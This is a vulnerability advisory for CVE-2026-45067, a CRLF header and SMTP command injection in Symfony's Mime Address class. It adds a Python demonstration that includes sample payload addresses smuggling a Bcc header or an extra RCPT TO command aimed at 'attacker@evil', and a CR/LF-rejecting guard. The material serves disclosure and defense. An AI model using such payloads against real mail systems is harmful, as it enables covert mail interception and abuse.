CVE-2026-45067: Symfony has Email Header / SMTP Command Injection via CRLF in Symfony\Component\Mime\Address
Symfony\Component\Mime\Address is the value-object every Symfony Mailer address (to/cc/bcc/from/reply-to) flows through; its constructor is documented as validating the address and throwing on invalid input, so developers treat it as a security boundary.
The constructor accepts email addresses whose local-part (the part before @) is an RFC-5322 quoted string containing raw \r\n bytes, e.g. "x\r\nBcc: attacker@evil"@example.com. The stored address is later emitted verbatim into (1) the rendered message headers and (2) SmtpTransport’s MAIL FROM:<...> / RCPT TO:<...> protocol lines, turning the embedded CRLF into a new mail header and/or a new SMTP command.
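The following Python script is an added illustration, not code from Symfony or from the advisory: it models the two emission paths described above (a rendered address header and an SMTP envelope line) with the raw address interpolated verbatim, and shows how a constructed quoted-local-part payload splits each one into two lines. The `is_safe_address` guard is a hypothetical application-level pre-check that refuses any bare CR or LF before the string reaches `Address`; it is stricter than RFC 5322 quoted-string syntax and is not a description of Symfony's own fix.

```python
import re

# Constructed sample inputs (not taken from a real incident). The first
# smuggles a mail header, the second a second SMTP command, by placing a
# raw CRLF inside an RFC 5322 quoted local-part.
CLEAN = "alice@example.com"
TAINTED_HEADER = '"x\r\nBcc: attacker@evil"@example.com'
TAINTED_SMTP = '"x\r\nRCPT TO:<attacker@evil>"@example.com'

CRLF_RE = re.compile(r"[\r\n]")


def render_header(name: str, address: str) -> str:
    """Render one address header the naive way the advisory describes:
    the stored address is emitted verbatim, so an embedded CRLF terminates
    the header and whatever follows is parsed as a new header line."""
    return f"{name}: {address}\r\n"


def render_rcpt_to(address: str) -> str:
    """Render the SMTP envelope line the same naive way; an embedded CRLF
    ends the RCPT TO command and the remainder is read as the next command."""
    return f"RCPT TO:<{address}>\r\n"


def injected_lines(rendered: str) -> list[str]:
    """Split rendered output on CRLF as a receiving MTA or header parser
    would. More than one non-empty line means the address smuggled content."""
    return [line for line in rendered.split("\r\n") if line]


def is_safe_address(address: str) -> bool:
    """Hypothetical hardened pre-check (an assumption of this example, not
    Symfony's fix): reject any bare CR or LF anywhere in the address,
    including inside a quoted local-part, before constructing Address."""
    return CRLF_RE.search(address) is None


if __name__ == "__main__":
    for addr in (CLEAN, TAINTED_HEADER, TAINTED_SMTP):
        verdict = "accepted" if is_safe_address(addr) else "REJECTED by guard"
        print(f"{addr!r}: {verdict}")
        print("  header lines :", injected_lines(render_header("To", addr)))
        print("  SMTP lines   :", injected_lines(render_rcpt_to(addr)))
```

Running the script prints one line per rendered header or envelope for the clean address and two for each tainted one, which is exactly the extra header or extra SMTP command the advisory describes. Rejecting CR and LF outright is the pragmatic choice here: neither the header serialisation nor the SMTP transport can carry those bytes safely, so there is no legitimate address they would exclude.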
References
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/mime/CVE-2026-45067.yaml
- github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2026-45067.yaml
- github.com/advisories/GHSA-qpmx-3rfj-7rhv
- github.com/symfony/symfony/commit/dc2dbd29211eb4ddc451373fa1374fb926e94604
- github.com/symfony/symfony/security/advisories/GHSA-qpmx-3rfj-7rhv
- nvd.nist.gov/vuln/detail/CVE-2026-45067
- symfony.com/cve-2026-45067